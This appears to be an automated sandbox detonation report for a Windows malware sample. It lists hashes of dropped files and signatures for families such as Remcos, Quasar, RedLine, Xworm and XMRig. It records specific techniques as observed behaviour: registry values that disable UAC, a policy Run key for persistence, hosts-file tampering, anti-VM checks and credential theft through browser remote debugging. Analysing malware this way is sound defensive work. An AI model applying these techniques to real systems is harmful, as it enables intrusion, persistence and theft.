SHA512 d51b8893ce58395dbd03441e59ca367d94a346e4241925db84b88f57209c98ebdc1513942606a4e469bf622968a10f03ce7b10f314d0ddc061675d46f34c8a3c

C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe

MD5 3f44dd7f287da4a9a1be82e5178b7dc8
SHA1 996fcf7b6c0a5ed217a46b013c067e0c1fe3eba9
SHA256 e8000766c215b2df493c0aa0d8fa29fae04b1d0730ad1e7d7626484dc9d7b225
SHA512 1d6b602bf9b3680d14c3c18d69c2ac446ad2c204fca23da6300b250a2907e24cf14604dc7d6c2649422071169de71d9fc47308bfbbb7304b87d8d238aa419d03

C:\Users\Admin\AppData\Local\Temp\a\5dismhost.exe

MD5 2ca5f321b0683c4cdd64c2ab7761c2db
SHA1 1af4717e30ee791aa16c88f5d319bc949bdec2d5
SHA256 b19d81651cf60b9a4344f531832e7421a38ab29eaa3946de230ca72e849aa4e4
SHA512 a3f75cf31b96f480ada63a1550fbfad92daf14944e32d142afe35494058f07ce846224aef47dea7ce9da45be5e2008b0b4650e0e12d207842e83b0c6d9be89ff

C:\Users\Admin\AppData\Local\Temp\a\4dismhost.exe

MD5 8b712dbac428c4107c3c44f92743d8e6
SHA1 65027334951d9be6149627fef6a45f2397cfe747
SHA256 fd1eb7d83a9f704ba4f4ebea145dca07de27d78d622c24b506c9fd0f7dc090f3
SHA512 e162e242fff25aaa8192ce69a5749fa2f6919a3413c158f40b4eb383a24088c7aa321b3286d97723a960a3e9406db8747d752725f981e9c903bada8f1524d22e

C:\Program Files (x86)\AnyDesk\AnyDesk.exe

MD5 d25c3bd6c96b1d4b95f492a9daa4a6a1
SHA1 9b4f388fec4511ce3fa5bf855626c7c7b517ac21
SHA256 fa0f2e683c50d4908381e6ef16edcec29cc3f1d225b63de58f83d1c9bd854ff9
SHA512 75d26dc48a6446e3bf47c45edd3697d52332106a400f34b4ca7af588e226f5f5563a13156568582b6e5a97edd8f1cf60d1ede7dcb9d5aca9f41eec628a7e041a

C:\Users\Admin\AppData\Local\Temp\a\6dismhost.exe

MD5 ac1997ffe0c45d75cec0f1bbfe24cd62
SHA1 67f28f8d9ff0a2f3a6d84948f541b204339a26e4
SHA256 63424ba4e2e4c05fd5f7592d93d611a426c2bfb80f9989ecfd6b34613004614a
SHA512 527856bfb0c7cdd390dd4e868ca9137b27cd1c46c4450f061db7e1d9483403e96dbad56127fb8b186b8a3f3a5b363036e0809e9de8a9973fd89d3a79c1d52144

C:\Users\Admin\AppData\Local\Temp\a\3dismhost.exe

MD5 6304ce36f17952d70bceb540d4b916ac
SHA1 737d2ecf8f514e85c2776416100eefb5ea23391c
SHA256 6b0bd6af17d546a941450c6463e3c704810b78910a6f6b31feca4e8a4200db78
SHA512 60674f266829fd74b8d15867193ebbbed77633fe89eee3824ab15d9bc563e684e4f1b3bd2ac34b03d527554f6a4bce7a16fe27c48e06ad5c0e25e3a7e9c8c78e

C:\ProgramData\AnyDesk\system.conf

MD5 25e71767a94343d45dd3e066c05784bf
SHA1 901ae90156458e9b91f29cb0789964a5bfbc1127
SHA256 1b7467f3f2b0a63dc29701aa97c9e7b76757e4aa6c44d61e48e067068ca88525
SHA512 ae538706623ced39a44622e9fd0f0422c4824bf9e8cc2ef6b143458873d142230ad949efeb8651fdba70f9488be935ace6bf40a8da842d74ca7895c85abb4bd6

C:\ProgramData\AnyDesk\system.conf

MD5 4f559d9257cbacf85aaeb62f530c70cd
SHA1 23c369aeb9a8f6e8c036291a159bfa94b7595f91
SHA256 863f86c0cd7c7451faa39ac7d9de56522eae32ba652d1d31d48743295eead598
SHA512 5d92dab2df65e54a3ba445682479f01bd1e620fdcd99b4420ef9fcd0382363004ab439a481e0d6ba79b6831fe899956a611738305fa04fdf18111bae6efe1389

C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe

MD5 8e0d340e723ce188de651b8ffb887d81
SHA1 cb90a07f1a4ffae68cca6281325606009d3d7266
SHA256 514c0d56b0b5ea74a2729c99adcc92cd4b51795498281c1675636bb5b9d17cb7
SHA512 d5505ef82f69085b975312255bb733f66a97850ecb6608000ba642ec7d2997a88a184d230c38acfe01a9d33adf0b46b88a59d4b97bf11ae9a45b7b9c7e2904e1

C:\Users\Admin\AppData\Local\Temp\a\Complexo%20v4.exe

MD5 d9694a6a1989d79aeded3f93cb97d24e
SHA1 a18019b9793029dac4d10e619ec85ea26909336a
SHA256 772c7a131d2a7a239ec39f32214eb94113aacd3984f572fb7e3b1fa1bec98f8c
SHA512 35a29c81d72f0e0bdb169c400dc90bf85859313c250824bf1fbbe362903c63f6a826e94994f8d86e8f56def5ce34cc71a45c6ff936e85fcfe8d169dbdb118168

C:\ProgramData\AnyDesk\system.conf

MD5 97d9059805b59a38cef6036e01ac9056
SHA1 40429fc8a0d83c6f06f35597e86cc27ef34e1603
SHA256 4cef3a4802bc4cdbde24e0870022c2914608d7bdcc268cf0e1b7d99ec3a0ddbc
SHA512 eaf8b96acc2e66ba07c5881de8d2f1d853f9191c494dc436425a297390fd5239fd48ce1dd7cfde0393237dc1811f52822405b5f397cfc15a98f763c04d233041

C:\Users\Admin\AppData\Local\Temp\a\srtware.exe

MD5 e364a1bd0e0be70100779ff5389a78da
SHA1 dd8269db6032720dbac028931e28a6588fca7bae
SHA256 7c8798ab738b8648a5faa9d157c0711be645fabf49c355a77477fb8da5df360e
SHA512 ff2ebfe652cdace05243df45100d5f8e306f65a128ec0b5395d1cc7be429e1b4090f744860963ef9996f74bccee134f198e9a6b0ff14383a404c6e4c9e6ef338

C:\ProgramData\AnyDesk\system.conf

MD5 00492073968f429aa15f846b05734abd
SHA1 10c780c8823c596b573920a9512669f835b0a4cd
SHA256 e1d9080aefbe65664c44397a1f32ff65fd9d7d2c3be70b798b96eb5996dd89d9
SHA512 27f2940415119814410ce466acee0c98e04f4ddccac2532f9cb2db97916c5f0187c8c759649e91fd2373e85da6a9b89ccd9d5486a5741528ff9a853ac26116f8

C:\ProgramData\AnyDesk\system.conf

MD5 4632db03390d946c7203ab740ed675ae
SHA1 dd1bf137dfc473f27812141d26c7637a5f52762f
SHA256 1137936891f91d3564d2f2a12c35f551c8dc5036c914a3610f111e550852a5c8
SHA512 cdded7ac54483b1bebc7ff7505f7d0381f1b1a97648b8e963b0084f33a465084d1e1b3213428a8d9726bb68027b6fbeface3eecb1941c93cd6dc7620b3c9446a

C:\ProgramData\AnyDesk\system.conf

MD5 4b7c630cdf106dbb92bf5956e18d6ea0
SHA1 df632a9931de7360b9b9c14c1c95db83daf45b1a
SHA256 e3036170507bfd31fd5a734f7d3b2cb10e980f89bb1962361d6ab786d23431c9
SHA512 4f076d2a0d109c53911b7fd856f144dafa2a0ec02611de4fc57584a5f458155809cf9243f8939640a1e4e1e02163838ea65c338e5d5632eff7b13bc8589f5585

C:\ProgramData\AnyDesk\system.conf

MD5 c38812c636e3c0b5b94e15c135a736c0
SHA1 3e3a3b0ec09b34521282ada8439730662af5d6d8
SHA256 23f7ff585409734df1bfb29d9101bc6a8ec44a41079eebf699e568c4c10cdd36
SHA512 5baf8d3ba715c089fe326bdd0f11c9aa62c88a7194db5ea4809780fe69c3d09b70cde2f4f8a473134692ef4b342bd3d18ea5e3c04eb51b4694e8f8b6b152940c

C:\ProgramData\AnyDesk\service.conf

MD5 1571ac8abb5f7e94d16cda9a61f69a62
SHA1 7537508c386ccde8da472d1aa3403d8583020123
SHA256 141d1c772553ba42dd4cb21ed07f00bfa1db06bc19432603af5a678c5f86166b
SHA512 a596f2b979bb3365358bd46dd9bd69f58c73a25186de690402bba436d7128896d0b5f4e7713d9f31b95e385b411a6ecb166fe997900e1a7ce6b7cd7319956965

C:\ProgramData\AnyDesk\service.conf

MD5 83fab3de835e536b54070485ee73b11a
SHA1 532ea4d404622556ebf1a7c3fd061cb42163f49a
SHA256 f778ecbcd94e28a5eb3eae07a1330b2b7c1a3b61241f8deb41ab71e825497504
SHA512 64873890c80c47398d658ae85acf8cba737ba425fff706a673fa21e36feced3b8e53c9fbb56e3b91c97e5f5faf7fab46b67c2c119c632ebb21271cd9574e3e61

C:\ProgramData\AnyDesk\system.conf

MD5 4e24eeda3d3f9adb95ed2a2786b88fdf
SHA1 29d45ae55f61634bd3c3576bfac97c15f53b62e7
SHA256 c58e3c7b3c28fc414459e62cff0952a948e9e7911e1f2cc913f3523bc9599e62
SHA512 8535aa7639e730832da0d48862d0816cfdcd04da60a8c7343c8413e22b4270b9e2e06c23d2539585a3d172fe1e5a116f2c37a4818a020e646cfac00242aa68f7

C:\ProgramData\AnyDesk\system.conf

MD5 fed60826e671b7f25af145e3f15e24b4
SHA1 850c792730c135de028447308d5d541812d5ddc3
SHA256 3deb748ddd3314d4e4b1ea473fc3ca365e1915dd577da1d4de1cdaf9664fa105
SHA512 54abd1caec3fb2dc31c602fa5bd83a182fa2274091f94ae5b562f12fd0cd41ff940926c045392b59a7e89fded056e3871f18df2cb7a01df501733ccada27303c

C:\ProgramData\AnyDesk\system.conf

MD5 005c56c45b84451f00829acaced6dc62
SHA1 a595402d1cf107065fb8a49ebb4e3af2951ba4c8
SHA256 5eeb209d98540e9af832980e42dbcfc7c75e6cca547434f10e7b8d8a51954cbb
SHA512 fe3b3736e2842620ae7eab762121a7920fa85bd7b9bf9b7b33012ed5cb1e5a44b07f451a8db37ad75ea05dd50ea91533b275e9321a24ff933e2ad4854b447914

C:\ProgramData\AnyDesk\system.conf

MD5 4b84a7cdce3c507cffc83c37b5120db6
SHA1 19c97c0f82a714baeb51afbe241e402352a8c743
SHA256 aaec0a4771c3203014eb4ba03c1668e00bbd2558b37505976357d2ceaed81507
SHA512 ee2f7442c431c7021c90e23fe1e3ac67f61456b7e81997f1a7d6f3d4d9b0d71dd7f73bf52c57fec12ecffe3880c957213aec15ef40c66994987dffa4e5382fb4

C:\ProgramData\AnyDesk\system.conf

MD5 689c4334d3e224061d056d8d1f829683
SHA1 65fdb8873fb74f9c026d5e85e7b391caa5b2627a
SHA256 492634f9770eb72f42e9a91d57b052316e04267ea53a58786be2881778b1dcf6
SHA512 55aadb74421812140235655010078297398a2de736a8cc65b13ee08909b538152fa48a961040868a9726c36e57b834732f8ba7dc4b8aa17d8ac4716a0f7dcbb0

C:\ProgramData\AnyDesk\system.conf

MD5 cd20b228ff83b5c360c02570358dedd8
SHA1 30f747170dc40f1e4fc5d5c65973e73a800d500b
SHA256 a93a23ba5d5c8d008d9b9e16f668517a93f33cb5296b5e897197e095280e7d34
SHA512 6c7b4ac7f6abfe5f5a78c7ba9bc4bd233b554fbc8a69db4f4a11b3d37265cd4ab44304df88357fb64ab0db1304f223f62ef9941b5d9e98cadb64c66da46ab168

C:\ProgramData\AnyDesk\system.conf

MD5 5f62d3b47af32ec5f9cc5823dfef4215
SHA1 c4ca9f9073a2aa89f0276b28fa7e2bfe14f7d694
SHA256 2b137e654c82d3866ca9c2ca7083a8a234b107d6250b932a41de07853a05ec1b
SHA512 102a558809d3d109dc55a276ccb353ba8cedb19373b78ef0a22900f7c0d3ff061f13037238931fe909f4f2be017e07e4788a307a3acbc8d683f10631ca86ce87

C:\ProgramData\AnyDesk\system.conf

MD5 bb6b202ab1606ca947990f09307d7423
SHA1 009752509f0d5c75fc9a9cd3f23ffcbfd6c89690
SHA256 9787480d2f8740d430cd8ef805471221c63ccf722df6e7ec5a76838cba0ccbe6
SHA512 4224f6eaa0239cf0922f68a000ae9300feb1cf7facdb3551c32242b3285d7d2463f11c60c00a14d03258d3747dc90b325352e545c5d1d03257f5a5ffecadb7dc

C:\ProgramData\AnyDesk\system.conf

MD5 f2f2e871f0e5c47c1dfd36e53b0b687d
SHA1 ec4dbb3c4f7d4c36c8084cd1c7f250a58bf3a1a6
SHA256 75af50fdae482ce053b08db23163d252906104c8d1bdaca0f58774c17d4f6b11
SHA512 d96579f87126b04ef0d675e16eab682bb582590fb11f12dda432eb391a187ed2c835d449adef35d55a796d2c23e361823061504f63b7085dd96e5217af7e461b

C:\Users\Admin\AppData\Local\Temp\a\AutoHotkeyU64.exe

MD5 2d0600fe2b1b3bdc45d833ca32a37fdb
SHA1 e9a7411bfef54050de3b485833556f84cabd6e41
SHA256 effdea83c6b7a1dc2ce9e9d40e91dfd59bed9fcbd580903423648b7ca97d9696
SHA512 9891cd6d2140c3a5c20d5c2d6600f3655df437b99b09ae0f9daf1983190dc73385cc87f02508997bb696ac921eee43fccdf1dc210cc602938807bdb062ce1703

C:\Users\Admin\AppData\Local\Temp\   ‏      \Common Files\Desktop\DenyRegister.csv

MD5 6ad68fcedea3ac5903538f152122de14
SHA1 cc03629c7b216e7465d490f955d221e82330ce91
SHA256 c4e755a615e8f4423afe36936df6d1010bd9629e2b37c411ca1bd2cd02ff7411
SHA512 675082dab06f2a8fe30414d522c4ce6673a190dd7b69f9d2d4bf07678b6a819b9d22b92c09f2b53b8f1d14fda8f095b7d7f92d0de0e3337d9248c89188beb458

C:\Users\Admin\AppData\Local\Temp\   ‏      \Common Files\Desktop\WaitResume.docx

MD5 1129044bf9629b34cd5fd01a1ed5a6ad
SHA1 61999fb56b01cd4dd6c254c07019762ef99f4557
SHA256 e5238dd5843917f34d4fde78b54b5a38feb1a41ce518818f4c003e486edc4f8d
SHA512 715ee50f11544de57ae79d67350d8fe701505d19d856c26b37596c48db21f5d643f1f9347492b2535e40e7b29eba6add66b0d2ccfa7a48df3a2e8f7a88f43c6e

C:\Users\Admin\AppData\Local\Temp\   ‏      \Common Files\Desktop\PublishBackup.docx

MD5 8f5bf952ca67c2f7357e97e2585a2cd1
SHA1 dea1f5d43ab0ae53a33b6d814ae812a514259add
SHA256 134158bbc6a3769e6f7cd31e3134f6e1af78e4e413a26c39ce695497e016ea28
SHA512 18c4716300628a12ae949e63090da4f8661fc6c70a931f50bcb5e238f2b8f7dda3b5711efaded1b32d660b81ef3456a038e5bbe7baf04bae046363f668799cb1

C:\Users\Admin\AppData\Local\Temp\   ‏      \Common Files\Desktop\MountOpen.docx

MD5 ed983cffe1754ca63b3e7d7773b97a96
SHA1 c4caf2aa596eef333c3bc7617e2c0353799ffd2a
SHA256 261737670e35373f4e4f6e1edf14252ee35d46ef52ad126ececd601606d8bfb5
SHA512 00228cd96f2017c37fe6ff4614dd138647a1e71c0b56fe4e2f1555cf7e0ee864963724a34d394e873214f2ac3140307557b5e584c876eb2662dd930d2f6b7c46

C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

MD5 9ca76314f444aade766954f10e3ede9a
SHA1 9f21b0e60014d9194747c9f984dd7963f4f32601
SHA256 0b97e881e49945e6316aaaa94d4abf7ee08e31beb72946ae64de90471196c0ad
SHA512 67215a7f64bc5d6fe617c0eca79944fa156b54af5329a1e0e3c36db94ee45d9539ad9918440919cc86021a0d4b24d612bf5732bc207f187a5a8c9b436dec3401

C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

MD5 c1bede31ffcd226a9c02ba016f01352d
SHA1 e99640d2868fccba6af7b6bafa00a8d10b9ae1b0
SHA256 4c63f319b42027c146bd3db011d3571cd7d9fe8f1684752183c7d22a4ef16cf5
SHA512 dfd5bac4cc34ccd05734346bc6a04a9a193f537498b5f4601ab2fb3e20d5c159453f8e09ab9b1ca88207a0c3673e0bad28dc3651505b4dcab5c7045faf52e458

C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

MD5 69d032dc127adf8f738389483d711e9e
SHA1 6d17b1dbb9eb16572cec4ee9888c45ba1167cf77
SHA256 4308bb8485a1b5cb1d105080d3d986e03653fcc70b5ed82048b7c62aea875d3f
SHA512 29e23842dce5b3a8e48a2acb74d57adb364476bf08fda0393c30d38749fff6916021f9ee5a731673954fe027f51c4cc81991fb8d5f4b6d9148fb9783ef87f065

C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe

MD5 ff7e78da9c8e580229fe95dfdfe5b098
SHA1 ab968e47e463f29426116753b0ca086fd5b33cdb
SHA256 cefa40083339d42320bc1f9ba33c578b8abe47e15eb0dd6b0ba2f734aa8f3d6d
SHA512 45517b8bc96613daeabb738a42188b8ef19b0ac2b53e3202f7d86f683dacdbe1c4a78414938ab5ad0b48b7c546bc89a78932e3b8a1dbf6604e59b4887de48409

C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe

MD5 d6b16370cd4e60185aa88607316a0c05
SHA1 7fbc63b1203617c67e5491745beaedb424baed78
SHA256 a6d6d1c8299f97f966d72373e999b5a8e6768914e27d5533307cf6878b95dce2
SHA512 16c468948e568343ab1a1460d82b4c5859d09043e3a0115aa9c0aefeabfa22c796cca505ede8b1f194764dda7c5263979230e3fa272ee1fb3b21919202b01906

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-12 18:20

Reported

2024-12-12 18:40

Platform

win10v2004-20241007-en

Max time kernel

355s

Max time network

1201s

Command Line

C:\Windows\Explorer.EXE

Signatures

Azorult

trojan infostealer azorult

Azorult family

azorult

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Discord RAT

stealer rootkit rat persistence discordrat

Discordrat family

discordrat

Gurcu family

gurcu

Gurcu, WhiteSnake

stealer gurcu

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Phorphiex family

phorphiex

Phorphiex payload

Description Indicator Process Target
N/A N/A N/A N/A

Phorphiex, Phorpiex

worm trojan loader phorphiex

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

Remcos

rat remcos

Remcos family

remcos

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Windows\system32\reg.exe N/A

Umbral

stealer umbral

Umbral family

umbral

Xmrig family

xmrig

Xworm

trojan rat xworm

Xworm family

xworm

xmrig

miner xmrig

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A

Enumerates VirtualBox registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF C:\Users\Admin\Desktop\Files\random.exe N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Desktop\Files\random.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Y06E.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1a51J4.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds policy Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\Users\Admin\Desktop\New Text Document mod.exse\a\RMX.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\Users\Admin\Desktop\New Text Document mod.exse\a\RMX.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\ProgramData\Remcos\remcos.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\ProgramData\Remcos\remcos.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\Desktop\New Text Document mod.exse\a\Winlogoh.exe N/A

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Stops running service(s)

evasion execution

Uses browser remote debugging

credential_access stealer
Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

A potential corporate email address has been identified in the URL: 3SCET_Admin@OFGADUSE_report.wsr

phishing

A potential corporate email address has been identified in the URL: naAjO_Admin@OFGADUSE_report.wsr

phishing

A potential corporate email address has been identified in the URL: oDRAV_Admin@OFGADUSE_report.wsr

phishing

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1a51J4.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Y06E.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe N/A
